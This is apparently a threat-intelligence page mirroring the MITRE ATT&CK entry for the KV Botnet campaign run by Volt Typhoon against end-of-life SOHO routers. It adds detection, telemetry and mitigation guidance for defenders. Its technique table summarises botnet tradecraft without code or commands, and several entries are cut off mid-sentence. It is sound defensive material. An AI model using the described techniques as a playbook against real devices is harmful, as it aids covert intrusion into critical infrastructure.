C0035: KV Botnet Activity
KV Botnet Activity consisted of exploitation of primarily “end-of-life” small office-home office (SOHO) equipment from manufacturers such as Cisco, NETGEAR, and DrayTek. KV Botnet Activity was used by Volt Typhoon to obfuscate connectivity to victims in multiple critical infrastructure segments, including energy and telecommunication companies and entities based on the US territory of Guam. While the KV Botnet is the most prominent element of this campaign, it overlaps with another botnet cluster referred to as the JDY cluster.[1] This botnet was disrupted by US law enforcement entities in early 2024 after periods of activity from October 2022 through January 2024.[2]
Analyst context for executives and security teams
KV Botnet Activity matters because it shows how compromised, often end-of-life SOHO network equipment can be used as intermediary infrastructure to conceal access to critical infrastructure victims. For leaders, the key issue is not only whether enterprise endpoints are monitored, but whether internet-facing routers, remote sites, and network-device dependencies create blind spots that adversaries can use to hide command-and-control and staging activity.
Executive priority
Prioritize this as an exposure-management and resilience issue: ATT&CK describes exploitation of primarily end-of-life SOHO equipment from Cisco, NETGEAR, and DrayTek, use by Volt Typhoon to obfuscate connectivity to critical infrastructure victims, and disruption by U.S. law enforcement in early 2024 after activity from October 2022 through January 2024. Executives should ask whether asset inventories include network devices and remote connectivity equipment, whether end-of-life devices are tracked for replacement, and whether incident response plans account for adversary infrastructure that may appear to originate from benign residential or small-office networks.
Technical view
SOC and IR teams should validate visibility around the campaign’s related behaviors: discovery of system, network, process, file, and security software information; Unix shell execution; ingress tool transfer; command-and-control over encrypted, non-application-layer, or non-standard-port channels; masqueraded tasks or services; file deletion; Linux permission changes; bind mounts; proc memory injection; event-triggered persistence; and modification or disabling of defensive tools. Because the campaign object has no official detection text and no platforms specified, detection engineering should be driven by the related techniques and local evidence from Linux, macOS, ESXi, network-device, IaaS, and other applicable environments only where those assets exist.
Likely telemetry
- Network device inventory, model, firmware, support status, and external exposure records
- Firewall, proxy, NetFlow, DNS, and remote access logs showing unusual encrypted, non-standard-port, or non-application-layer communications
- Router and network-device configuration backups, authentication logs, and administrative change records where available
- Linux/Unix shell command history and process execution telemetry on applicable systems
- Process, file, directory, permission, mount, and /proc-related telemetry on Linux systems
Detection direction
- Confirm whether telemetry exists for network devices and SOHO-class equipment used by the organization, including remote offices and third-party-managed locations; many programs monitor servers but not routers or edge appliances.
- Tune for combinations of discovery commands, shell execution, file transfer, permission changes, file deletion, and security-tool discovery rather than relying on any single behavior, since many individual commands can be administrative.
- Review outbound traffic for encrypted channels, non-standard ports, and non-application-layer protocols, especially when paired with unusual network-device or Linux host behavior.
- Use relationship-driven context: compromised network devices and VPS infrastructure can make source IP reputation alone unreliable, so detections should include behavioral, asset, and session context.
- Validate monitoring for masqueraded tasks or services and event-triggered execution on applicable systems; compare names, paths, owners, and timing against known-good baselines.
Mitigation priorities
- Identify and replace or isolate end-of-life network and SOHO-class devices, especially those exposed to the internet or used in remote offices.
- Maintain an accurate inventory of network devices, firmware status, ownership, and logging capability; include devices outside traditional endpoint management.
- Harden remote administration paths for routers and network devices, limiting exposure and enforcing strong administrative control where supported.
- Centralize and retain network, firewall, DNS, proxy, and device-administration logs sufficient for incident reconstruction.
- Baseline expected outbound ports, protocols, and destinations for critical infrastructure and remote-site networks, then investigate deviations.
Analyst notes and limits
The supplied ATT&CK campaign states that KV Botnet Activity exploited primarily end-of-life SOHO equipment and was used by Volt Typhoon to obfuscate connectivity to victims in multiple critical infrastructure segments, including energy, telecommunications, and entities in Guam. Related techniques indicate a Linux/network-device-heavy operational pattern with discovery, stealth, command-and-control, tool transfer, and defense-impairment behaviors. The campaign was reported as disrupted by U.S. law enforcement in early 2024 after activity from October 2022 through January 2024; this summary does not infer current activity beyond the supplied fields.
The campaign object provides no official detection text, no explicit platforms, and no detailed victim-environment telemetry requirements. Technique relationships provide useful defensive direction, but local asset inventory, logging coverage, firmware status, and network architecture are required to determine actual risk and detection coverage.
KV Botnet Activity
KV Botnet Activity consisted of exploitation of primarily “end-of-life” small office-home office (SOHO) equipment from manufacturers such as Cisco, NETGEAR, and DrayTek. KV Botnet Activity was used by Volt Typhoon to obfuscate connectivity to victims in multiple critical infrastructure segments, including energy and telecommunication companies and entities based on the US territory of Guam. While the KV Botnet is the most prominent element of this campaign, it overlaps with another botnet cluster referred to as the JDY cluster.[1] This botnet was disrupted by US law enforcement entities in early 2024 after periods of activity from October 2022 through January 2024.[2]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1685 | Disable or Modify Tools | KV Botnet Activity used various scripts to remove or disable security tools, such as |
| Enterprise | T1016 | System Network Configuration Discovery | KV Botnet Activity gathers victim IP information during initial installation stages.CitationLumen KVBotnet 2023 |
| Enterprise | T1057 | Process Discovery | Scripts associated with KV Botnet Activity initial deployment can identify processes related to security tools and other botnet families for follow-on disabling during installation.CitationLumen KVBotnet 2023 |
| Enterprise | T1584.008 | Network Devices Sub-technique | KV Botnet Activity focuses on compromise of small office-home office (SOHO) network devices to build the subsequent botnet.CitationLumen KVBotnet 2023 |
| Enterprise | T1105 | Ingress Tool Transfer | KV Botnet Activity included the use of scripts to download additional payloads when compromising network nodes.CitationLumen KVBotnet 2023 |
| Enterprise | T1583.003 | Virtual Private Server Sub-technique | KV Botnet Activity used acquired Virtual Private Servers as control systems for devices infected with KV Botnet malware.CitationLumen KVBotnet 2023 |
| Enterprise | T1055.009 | Proc Memory Sub-technique | KV Botnet Activity final payload installation includes mounting and binding to the |
| Enterprise | T1095 | Non-Application Layer Protocol | KV Botnet Activity command and control traffic uses a non-standard, likely custom protocol for communication.CitationLumen KVBotnet 2023 |
| Enterprise | T1059.004 | Unix Shell Sub-technique | KV Botnet Activity utilizes multiple Bash scripts during botnet installation stages, and the final botnet payload allows for running commands in the Bash shell.CitationLumen KVBotnet 2023 |
| Enterprise | T1222.002 | Linux and Mac Permissions Sub-technique | KV Botnet Activity altered permissions on downloaded tools and payloads to enable execution on victim machines.CitationLumen KVBotnet 2023 |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | KV Botnet Activity installation steps include first identifying, then stopping, any process containing |
| Enterprise | T1070.004 | File Deletion Sub-technique | KV Botnet Activity removes on-disk copies of tools and other artifacts after it the primary botnet payload has been loaded into memory on the victim device.CitationLumen KVBotnet 2023 |
| Enterprise | T1573 | Encrypted Channel | KV Botnet Activity command and control activity includes transmission of an RSA public key in communication from the server, but this is followed by subsequent negotiation stages that represent a form of handshake similar to TLS negotiation.CitationLumen KVBotnet 2023 |
| Enterprise | T1036 | Masquerading | KV Botnet Activity involves changing process filename to |
| Enterprise | T1564.013 | Bind Mounts Sub-technique | KV Botnet Activity leveraged a bind mount to bind itself to the `/proc/` file path before deleting its files from the `/tmp/` directory.CitationLumen KVBotnet 2023 |
| Enterprise | T1546 | Event Triggered Execution | KV Botnet Activity involves managing events on victim systems via |
| Enterprise | T1571 | Non-Standard Port | KV Botnet Activity generates a random port number greater than 30,000 to serve as the listener for subsequent command and control activity.CitationLumen KVBotnet 2023 |
| Enterprise | T1083 | File and Directory Discovery | KV Botnet Activity gathers a list of filenames from the following locations during execution of the final botnet stage: |
| Enterprise | T1082 | System Information Discovery | KV Botnet Activity includes use of native system tools, such as |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | KV Botnet Activity involved removal of security tools, as well as other identified IOT malware, from compromised devices.CitationLumen KVBotnet 2023 |
Groups, software, and campaigns
G1017: Volt Typhoon
Volt Typhoon is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021, primarily targeting critical infrastructure organizations in the US and its territories including Guam. Volt Typhoon's targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. Volt Typhoon has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.[1][2][3][4]. The group has leveraged compromised SOHO routers to proxy command and control traffic and obscure its infrastructure, activity associated with the KV botnet.[5].
Reporting indicates a separate initial access cluster, SYLVANITE, has been observed exploiting internet-facing edge devices and transferring access to Volt Typhoon, also tracked as VOLTZITE, for follow-on operations. [6]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 3919978e3189… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Lumen KVBotnet 2023
Black Lotus Labs. (2023, December 13). Routers Roasting On An Open Firewall: The KV-Botnet Investigation. Retrieved June 10, 2024.
Open source URL -
[2]
DOJ KVBotnet 2024
US Department of Justice. (2024, January 31). U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure. Retrieved June 10, 2024.
Open source URL -
[3]
mitre-attack C0035Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.